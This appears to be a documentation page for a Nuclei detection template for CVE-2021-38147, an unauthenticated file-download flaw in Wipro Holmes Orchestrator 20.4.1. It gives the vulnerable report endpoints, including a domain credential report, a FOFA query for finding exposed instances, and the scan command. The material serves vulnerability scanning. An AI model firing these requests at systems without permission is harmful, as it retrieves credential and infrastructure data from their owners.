Wipro Holmes Orchestrator 20.4.1 - Information Disclosure
ID: CVE-2021-38147
Severity: high
Author: s4e-io
Tags: cve,cve2021,wipro,holmes,orchestrator
Description
Section titled “Description”Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel.
YAML Source
Section titled “YAML Source”id: CVE-2021-38147
info: name: Wipro Holmes Orchestrator 20.4.1 - Information Disclosure author: s4e-io severity: high description: | Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel. remediation: | Fixed In v21.4.0 reference: - https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2021-38147 - https://www.wipro.com/holmes/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-38147 cwe-id: CWE-306 epss-score: 0.00497 epss-percentile: 0.76242 cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* metadata: max-request: 4 vendor: wipro product: holmes fofa-query: title="Holmes Orchestrator" tags: cve,cve2021,wipro,holmes,orchestrator
http: - method: GET path: - "{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel" - "{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel" - "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel" - "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"
stop-at-first-match: true matchers: - type: dsl dsl: - "contains_all(header, 'application/vnd.openxml', 'attachment; filename=')" - "contains(body, '<?xml version=')" - "status_code == 200" condition: and# digest: 4b0a00483046022100832cd551eccb17f8e9bda235842e2bff517f627daaa977461ce19483647f6762022100d9272507353f23c0ca4343fbd2764db9fe75e068bcc74eaa967306e6dfb3c023:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-38147.yaml"